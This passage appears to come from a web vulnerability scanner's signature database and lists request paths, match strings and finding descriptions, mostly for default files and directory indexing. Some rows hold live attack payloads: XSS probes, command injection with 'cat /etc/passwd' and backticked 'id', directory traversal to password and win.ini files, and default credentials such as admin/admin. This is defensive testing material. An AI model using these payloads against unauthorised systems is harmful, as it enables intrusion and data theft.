"002918","3233","2","/help/readmes.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002919","3233","2","/help/smhelp.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002920","3233","2","/help/srvinst.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002921","3233","2","/help4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002922","3233","2","/helpadmin.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002923","3233","2","/helplt4.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002924","3233","2","/internet.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002925","3233","2","/javapg.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002926","3233","2","/lccon.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002927","3233","2","/migrate.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002928","3233","2","/npn_admn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002929","3233","2","/npn_rn.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002930","3233","2","/readmec.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002931","3233","2","/readmes.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002932","3233","2","/smhelp.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002933","3233","2","/srvinst.nsf","GET","200","","","","","This documentation database can be read without authentication. All default files should be removed.","",""
"002934","3233","2","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse","GET","SERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002935","3233","2","/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002936","3233","2","/netbasic/websinfo.bas","GET","Company","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002937","3233","2","/perl/env.pl","GET","HSERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002938","3233","2","/perl/samples/env.pl","GET","HSERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002939","3233","2","/perl/samples/lancgi.pl","GET","Lan Boards","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002940","3233","2","/perl/samples/ndslogin.pl","GET","Fullname","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002941","3233","2","/perl/samples/volscgi.pl","GET","Size","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002942","3233","2","/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse","GET","SERVER_SOFTWARE","","","","","Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.","",""
"002943","3233","2","/index.html.ca","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002944","3233","2","/index.html.cz.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002945","3233","2","/index.html.de","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002946","3233","2","/index.html.dk","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002947","3233","2","/index.html.ee","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002948","3233","2","/index.html.el","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002949","3233","2","/index.html.en","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002950","3233","2","/index.html.es","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002951","3233","2","/index.html.et","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002952","3233","2","/index.html.fr","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002953","3233","2","/index.html.he.iso8859-8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002954","3233","2","/index.html.hr.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002955","3233","2","/index.html.it","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002956","3233","2","/index.html.ja.iso2022-jp","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002957","3233","2","/index.html.kr.iso2022-kr","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002958","3233","2","/index.html.ltz.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002959","3233","2","/index.html.lu.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002960","3233","2","/index.html.nl","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002961","3233","2","/index.html.nn","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002962","3233","2","/index.html.no","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002963","3233","2","/index.html.po.iso8859-2","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002964","3233","2","/index.html.pt","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002965","3233","2","/index.html.pt-br","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002966","3233","2","/index.html.ru.cp-1251","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002967","3233","2","/index.html.ru.cp866","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002968","3233","2","/index.html.ru.iso-ru","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002969","3233","2","/index.html.ru.koi8-r","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002970","3233","2","/index.html.ru.utf8","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002971","3233","2","/index.html.se","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002972","3233","2","/index.html.tw","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002973","3233","2","/index.html.tw.Big5","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002974","3233","2","/index.html.var","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
"002975","3233","2","/test","GET","test hierarchy","","","","","Apache Tomcat default file found. All default files should be removed.","",""
"002976","3233","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0739. MS99-013.","",""
"002977","3233","2","/iissamples/issamples/ixqlang.htm","GET","Query Language","","","","","IIS default file found. All default files should be removed.","",""
"002978","3233","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.","",""
"002979","3233","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0739. MS99-013.","",""
"002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0739. MS99-013.","",""
"002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.","",""
"002982","3233","2","/mc-icons/","GET","[Ii]ndex [Oo]f ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""
"002983","3233","2","/ns-icons/","GET","[Ii]ndex [Oo]f ","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""
"002984","3233","3","@CGIDIRSprintenv","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","",""
"002985","3233","3","@CGIDIRSprintenv","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431.","",""
"002986","3233","3","@CGIDIRStest-cgi","GET","PATH_TRANSLATED","","","","","Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.","",""
"002987","3233","3","@CGIDIRStest-cgi","GET","Premature end of script headers: \/","","","","","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.","",""
"002988","3233","3","/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E","GET","Edit Database","","","","","Oracle admin page may reveal passwords in a prebuilt form and reveal database information.","",""
"002989","3233","3","/test.php","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","",""
"002990","3233","3","/test/info.php","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","",""
"002991","3233","3","/info.php","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","",""
"002992","3233","3","/test/phpinfo.php","GET","PHP Version","","","","","PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.","",""
"002993","3233","b","/NetDetector/middle_help_intro.htm","GET","NIKSUN-HELP","","","","","The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html","",""
"002994","3233","b","/a/","GET","200","","","","","May be Kebi Web Mail administration menu.","",""
"002995","3233","b","/basilix/","GET","200","","","","","BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'","",""
"002996","3233","b","/bottom.html","GET","Topaz Prism","","","","","Topaz Prism appears to be running, try login with admin/admin.","",""
"002997","3233","b","/interchange/","GET","200","","","","","Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.","",""
"002998","3233","b","/sca/menu.jsp","GET","Service Control Agent","","","","","Entrust GetAccess Service Control Agent is installed.","",""
"002999","3233","b","/","SEARCH","Length Required","","","","","WebDAV is installed.\n",";",""
"003000","3268","2","/icons/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003001","3268","2","/manual/images/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003002","3268","2","/com/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003003","3268","2","/COM/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003004","3268","2","/doc/packages/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003005","3268","2","/image/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003006","3268","2","/javax/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003007","3268","2","/perl/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003008","3268","2","/scripts/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003009","3268","2","/SUNWmc/htdocs/en_US/","GET","[Ii]ndex [Oo]f ","","","","","Directory found. This is likely a Sun Solstice installation.","",""
"003010","3268","2","/search/inc/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. This is likely Sun One Webserver 6.1 search.","",""
"003011","3268","2","/images/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003012","3268","3","/docs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003013","3268","3","/examples/","GET","Directory Listing","[Ii]ndex [Oo]f ","","","","Directory indexing found.","",""
"003014","3268","3","/style/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003015","3268","3","/styles/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003016","3280","3","/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003017","3281","4","/search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;","GET",">\&lt;script\&gt;alert\(\)\&lt;\/script\&gt;","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003018","3282","8","/uploader.php","GET","200","","","","","This script may allow arbitrary files to be uploaded to the remote server.","",""
"003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. CVE-1999-0738. MS99-013.","",""
"003020","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0738. MS99-013.","",""
"003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. MS99-013.","",""
"003022","3284","6","/iissamples/exair/howitworks/Winmsdp.exe","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server. CVE-1999-1451, XF-2371, MS99-013 and MSKB-Q231368","",""
"003023","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""
"003024","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[windows\]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""
"003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
"003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
"003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
"003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
"003029","3288","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET","[Ii]ndex [Oo]f ","","","","","Abyss 1.03 reveals directory listing when 	 /'s are requested.","",""
"003030","3289","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003031","3294","4","/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003032","3295","4","/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003033","3295","4","/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003034","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","><script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003035","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003036","3296","4","/theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003037","3296","4","/theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.","",""
"003038","3297","4","/search.asp?Search=","GET",">\&lt;script\&gt;alert\(Vulnerable\)\&lt;\/script\&gt;","","","","","Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003040","3299","8","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003041","3299","8","/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003042","3299","8","/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003043","3299","8","/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003045","3300","6","/_vti_bin/","GET","shtml\.dll","shtml\.exe","","","","shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).","",""
"003047","3323","6d","/NULL.printer","GET","Error in web printer install","","","","","Internet Printing (IPP) is enabled. Some versions have a buffer overflow/DoS in Windows 2000 that allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. Disabling the .printer mapping i","",""
"003048","3337","3","/nul..cfm","GET","The template specification","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","",""
"003049","3337","3","/nul..dbm","GET","The template specification","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","",""
"003050","3337","3","/nul.cfm","GET","The requested file","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","",""
"003051","3337","3","/nul.dbm","GET","The requested file","","","","","ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. CVE-2002-0576. KPMG-2002013. BID-4542. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906","",""
"003053","3380","8","@CGIDIRSimagemap","GET","200","","","","","imagemap.exe was found. Many versions from different vendors contain flaws.","",""
"003054","3380","8","@CGIDIRSimagemap.exe","GET","200","","","","","imagemap.exe was found. Many versions from different vendors contain flaws.","",""
"003055","3382","3","@CGIDIRShtimage.exe/path/filename?2,2","GET","tried the following","","","","","htimage.exe can provide physical path of web server. BID-964. BID-1141.","",""
"003056","3384","d","@CGIDIRShtimage.exe","GET","200","","","","","htimage.exe may be vulnerable to a buffer overflow in the mapname portion. MS00-028. BID-1117","",""
"003057","3396","7","/mlog.html","GET","200","","","","","Remote file read vulnerability 1999-0068","",""
"003058","3396","7","/mlog.phtml","GET","200","","","","","Remote file read vulnerability 1999-0068","",""
"003059","3396","7","/mylog.html?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0068","",""
"003060","3396","7","/mylog.phtml?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0068","",""
"003061","3396","7","/php/mlog.html","GET","200","","","","","Remote file read vulnerability 1999-0346","",""
"003062","3396","7","/php/mlog.phtml","GET","200","","","","","Remote file read vulnerability 1999-0346","",""
"003063","3396","7","/php/mylog.html?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","",""
"003064","3396","7","/php/mylog.phtml?screen=/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","",""
"003065","3396","7","fi?/etc/passwd","GET","root:","","","","","Remote file read vulnerability 1999-0346","",""
"003066","3399","d","/cfide/administrator/index.cfm","GET","cfadminPassword","","","","","ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314.","",""
"003067","3399","d","/CFIDE/administrator/index.cfm","GET","cfadminPassword","","","","","ColdFusion Administrator for ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314.","",""
"003068","3399","d","/cfide/administrator/index.cfm","GET","PasswordProvided","","","","","ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314.","",""
"003069","3399","d","/CFIDE/administrator/index.cfm","GET","PasswordProvided","","","","","ColdFusion Administrator for ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314.","",""
"003070","3407","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution. CVE-2002-0434.","",""
"003071","3410","7","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","",""
"003072","3410","7","/content/base/build/explorer/none.php?/etc/passwd","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","",""
"003073","3411","3","/soapConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugtraq #4290.","",""
"003074","3412","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","",""
"003075","3412","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","",""
"003076","3414","3","@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA","GET","SYS:","","","","","Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.","",""
"003077","3416","7","/GW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
"003078","3416","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system. CVE-2002-0341.","",""
"003079","3416","7","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
"003080","3416","7","@CGIDIRSGWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
"003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.","",""
"003082","3423","3","/XSQLConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugtraq #4290.","",""
"003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.","",""
"003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CVE-2003-0801.","",""
"003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.","",""
"003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.","",""
"003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.CVE-2001-1233","",""
"003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.","",""
"003089","3500","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. CVE-1999-1376. BID-2252.","",""
"003090","3501","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
"003091","3501","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
"003092","3501","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
"003093","3512","7","/scripts/tools/getdrvrs.exe","GET","200","","","","","MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).","",""
"003094","3513","7","@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd","GET","root:","","","","","WebBBS by Darryl Burgdorf is vulnerable to command execution.","",""
"003095","3514","7","@CGIDIRSvote.cgi","GET","200","","","","","Mike's Vote CGI contained a bug which allowed arbitrary command execution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/","",""
"003096","3515","7","@CGIDIRSquizme.cgi","GET","200","","","","","Mike's Quiz Me! CGI contained a bug which allowed arbitrary command execution (version 0.5), see http://freshmeat.net/users/mikespice/","",""
"003097","3565","3","//","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed. CVE-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.","",""
"003098","3566","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CVE-2003-0243.","",""
"003099","3566","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
"003100","3566","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
